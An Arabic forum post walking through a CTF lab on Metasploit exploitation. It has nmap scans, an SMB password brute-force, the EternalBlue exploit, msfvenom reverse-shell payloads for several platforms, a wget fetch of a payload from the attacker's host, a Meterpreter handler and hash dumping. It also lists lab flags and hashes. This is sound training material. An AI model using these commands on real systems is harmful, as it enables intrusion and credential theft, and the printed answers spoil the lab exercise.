مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

[ WalkTh ] Metasploit : Exploitation

3b0-0d3b0-0d is verified member.

{ || مشرف قسم CTF || }
.:: طاقم المشرفين ::.

السمعة:

أوامر اساسية
  • Task 1
1700520120057.png
هنا يخبرك بما هو آتي:

سنتعلم كيفية استخدام Metasploit لفحص الثغرات واستغلالها. سنغطي أيضًا كيفية استخدام ميزة قاعدة البيانات في Metasploit لإدارة اختبارات الاختراق بنطاق أوسع. وفي النهاية، سنلقي نظرة على كيفية إنشاء حمولات باستخدام msfvenom وكيفية بدء جلسة Meterpreter على معظم منصات الهدف.

المواضيع التي سنغطيها بالضبط هي:
  1. كيفية مسح أنظمة الهدف باستخدام Metasploit.
  2. كيفية استخدام ميزة قاعدة البيانات في Metasploit.
  3. كيفية استخدام Metasploit لإجراء فحص للثغرات.
  4. كيفية استخدام Metasploit لاستغلال الخدمات الضعيفة الأمان على أنظمة الهدف.
  5. كيفية استخدام msfvenom لإنشاء حمولات والحصول على جلسة Meterpreter على النظام الهدف.
يرجى ملاحظة أنه بالنسبة لجميع الأسئلة التي تتطلب استخدام قائمة كلمات (مثل هجمات الاختراق بالقوة العنيفة)، سنستخدم قائمة الكلمات هذه Metasploit Word list
  • Task 2
1700520133674.png
معنى السؤال الاول كم عدد المنافذ المفتوحة على النظام المستهدف؟
عن طريق اداه nmap

1700520140282.png



معنى السؤال الثاني باستخدام الماسح الضوئي ذي الصلة، ما هو اسم NetBIOS الذي يمكنك رؤيته؟

نبحث عن netbios
نستخدم التي تم تحديدها لاننا نريد الاسم

نستخد الامر التالي use auxiliary/scanner/netbios/nbname
لكي نستخدمها لفحص ال NetBIOS على الجهاز الهدف
ثم امر set RHOST ( IP )
لنضع ال IP

ثم نكتب run
1700520156588.png
كما هو يظهر بالصوره الاسماء
الاسم المطلوب ACME IT SUPPORT
🚩 Task 2-2
ACME IT SUPPORT
معنى السؤال الثالث ما الذي يعمل على المنفذ 8000؟
يمكن معرفه عن طريق امر nmap 10.10.60.142 -sV -p 8000
1700520165084.png



🚩 Task 2-3
webfs/1.21
معنى السؤال الرابع السؤال او ما يرغب به هي معرفة كلمة مرور المستخدم “بيني” لبروتوكول SMB ؟ استخدم قائمة الكلمات المذكورة في المهمة السابقة. يقصد هذا Metasploit Word list

نبحث عن SMB Login نجد auxiliary/scanner/smb/smb_login

نستخد الامر التالي use auxiliary/scanner/smb/smb_login
لكي نستخدمها لمعرفه الباسورد الخاصه ب بيني

نستخدم الامر show options

لنضع الاسم وال ip والملف الذي يحتوي على الباسوردات

نكتب الاوامر التاليه
set RHOSTS ( ip )
set SMBUser penny
set PASS_FILE /path/to/MetasploitWordlist.txt

1700520177369.png
ثم ننتظر قليلا
1700520183188.png


🚩 Task 2-4
leo1234
  • Task 3
يشرح عن أوامر اساسية تجدها هنا الدرس الثاني : شرح المكاتب داخل Metasploit
🚩 Task 3
Completed
  • Task 4
معنى السؤال الاول من كتب الوحدة التي تسمح لنا بالتحقق من خوادم SMTP للترحيل المفتوح؟
1700520190171.png
نبحث عن smtp عن طريق امر search smtp
1700520197082.png
استخدم الامر info auxiliary/scanner/smtp/smtp_relay
1700520202340.png

🚩 Task 4
Campbell Murray
  • Task 5
1700520219311.png
معنى السؤال الاول استغلال إحدى نقاط الضعف الحرجة في الجهاز الافتراضي المستهدف
🚩 Task 5-1
Completed
معنى السؤال الثاني ما هو محتوى ملف flag.txt؟

حله كاللآتي

يجب الفحص عن طريق اداه nmap بالامر التالي nmap -sC ( IP )
1700567280190.png
عن طريق ms17_010_eternalblue … كيف عرفنا ؟

ببساطه عند النظر لنتائج الفحص عن طريق اداه nmap

نجد أن النظام ويندوز 7

اقوم بعمل بحث خفيف على قوقل هل به اي ضعف >>>
1700567287907.png
Boom!

نقوم بالبحث على ميتاسبلويت عن eternalblue نجد
exploit/windows/smb/ms17_010_eternalblue
1700567388615.png
استخدم الامر التالي use exploit/windows/smb/ms17_010_eternalblue

ثم الامر التالي show payloads ليظهر ال payloads
يمكن استخدام اكثر من بايلود لكن

عن طريق بايلود payload/generic/shell_bind_tcp

اكتب الامر set payload 2 ليتم تعين ال payload

بعدها قم بتعيين القيم التاليه LHOST,RHOST
مثل
set RHOSTS 10.10.89.140
set LHOST 10.8.119.34

  • علما ان 👇
ال ip : RHOSTS الجهاز المستهدف
و
ال ip : LHOSTS جهازي
1700520245822.png
بعدها اكتب run
1700520254335.png
بعد الدخول نبحث عن اسم الملف الذي حصلنا عليه من السؤال
1700520260920.png
عن طريق الامر التالي يمكن البحث عن الملف dir C:\flag.txt /s
او
عن طريق الامر التالي يمكن البحث عن الملف search -f flag.txt
1700520267888.png
يمكن عرض ما بداخله عن طريق امر type C:\Users\Jon\Documents\flag.txt

1700520273413.png

🚩 Task 5-2
THM-5455554845
معنى السؤال الثالث ما هو تجزئة NTLM لكلمة مرور المستخدم “pirate”؟

عن طريق امر hashdump كما هو موضح ب “أوامر اساسية” في هذا المقال الدرس الثاني : شرح المكاتب داخل Metasploit



يستخدم لاستخراج تجزئة NTLM (NTLM hash) من الأجهزة المستهدفة. hashdump

🚩 Task 5-3
8ce9a3ebd1647fcc5e04025019f4b875

مقدمة عن Msfvenom:

هي أداة مهمة في إطار Metasploit تُستخدم لإنشاء payloads (أو برامج ضارة) التي يمكن استخدامها لأغراض الاختراق. يُمكن تخصيص هذه ال payloads لأنظمة متنوعة مثل Windows وLinux وغيرها.

أمثلة على استخدام Msfvenom:
  1. انشاء Payload لنظام Windows بصيغة exe:
كود:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=( IP ) LPORT=( port ) -f exe > rev_shell.ex

النتيجة: ستحصل على ملف “rev_shell.exe” يمكن تشغيله على جهاز Windows المستهدف.
  1. انشاء Payload لنظام Linux بصيغة elf:
كود:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=( IP ) LPORT=( port ) -f elf > rev_shell.elf

النتيجة: ستحصل على ملف “rev_shell.elf” يمكن تشغيله على جهاز Linux المستهدف.
  1. انشاء Payload لاستخدام لغة PHP:
كود:
msfvenom -p php/meterpreter_reverse_tcp LHOST=( IP ) LPORT=( port ) -f raw > rev_shell.php

النتيجة: ستحصل على ملف “rev_shell.php” يمكن تنفيذه على خادم ويب يستخدم PHP للحصول على الوصول.
  1. انشاء Payload لاستخدام لغة Python:
كود:
msfvenom -p cmd/unix/reverse_python LHOST=( IP ) LPORT=( port ) -f raw > rev_shell.py

النتيجة: ستحصل على ملف “rev_shell.py” يمكن تنفيذه باستخدام Python على الجهاز المستهدف.

1700520289629.png
Task 6​
معنى السؤال الاول قم بتشغيل VM المرفق بهذه المهمة. اسم المستخدم هو murphy، وكلمة المرور هي 1q2w3e4r. يمكنك الاتصال عبر SSH أو تشغيل هذا الجهاز في المتصفح. بمجرد وصولك إلى الوحدة الطرفية، اكتب “sudo su” للحصول على غلاف الجذر، وهذا سيجعل الأمور أسهل.

سجل دخول على ssh عن طريق الامر التالي ssh [email protected]
1700567309323.png

ثم نكتب sudo su
1700567320066.png
🚩 Task 6-1
Completed
معنى السؤال الثاني قم بإنشاء meterpreter payload بتنسيق .elf (على AttackBox، أو جهاز الهجوم الذي تختاره).

عن طريق الامر التالي

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=( IP ) LPORT=( port ) -f elf > rev_shell.elf
1700520306882.png

🚩 Task 6-2
Completed


معنى السؤال الثالث انقله إلى الجهاز المستهدف (يمكنك بدء تشغيل خادم ويب Python على جهازك المهاجم باستخدام الأمر python3 -m http.server 9000
واستخدام wget http://ATTACKING_10.10.77.207:9000/shell.elf لتنزيله على الآلة المستهدفة).
1700567330754.png
🚩 Task 6-3
Completed
معنى السؤال الرابع احصل على جلسه ( meterpreter ) على الجهاز المستهدف

للحصول على جلسه meterpreter

اولا يجب استخدام exploit/multi/handler يستخدم هذا الأمر بشكل خاص لإعداد ( listener ) لاستقبال الاتصالات الواردة من الأنظمة المستهدفة بعد استغلال الثغرات فيها.

ثم قمت بتحديد الشل العكسي الذي سيتم استخدامه باستخدام الأمر
set payload linux/x86/meterpreter/reverse_tcp هذا الشل يستخدم عادة للتحكم عن بعد في النظام المستهدف.

ثم نضع ال ip اللي في ال LHOST عن طريق الامر التالي set LHOST 10.13.29.182

ثم نضع البورت الذي تم كتابته بملف الاتصال العكسي عن طريق اداه msfvenom

عن طريق الامر التالي set LPORT 1234

ثم تشغيل المستمع عن طريق الامر التالي run
1700520321393.png
ملاحظه

متخربط بالصوره بكتابه PORT بدلا من LPORT فقم بتعديلها[/COLOR]


ثم يجب رفع صلاحيات الملف عن طريق امر
كود:
chmod +x rev_shell.elf

ثم تشغيل الملف
1700520331184.png
ثم يأتي الاتصال العكسي
1700520331184.png
🚩 Task 6-4
Completed
ثم عن طريق post/linux/gather/hashdump

علما ان post/linux/gather/hashdump يستخدم لاستخراج ال hashes كلمات المرور من أنظمة Linux.
🚩 Task 6-5
Completed
ثم عن طريق امر run post/linux/gather/hashdump يمكن اظهار ال hashes
1700520358516.png
🚩 Task 6-6
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0


1700520366000.png

🚩 Task 7
Completed
1700520373366.png
 

المرفقات

  • 1700567315981.png
    1700567315981.png
    4.9 KB · المشاهدات: 241
التعديل الأخير:

آخر المشاركات

فانوس

رمضان
عودة
أعلى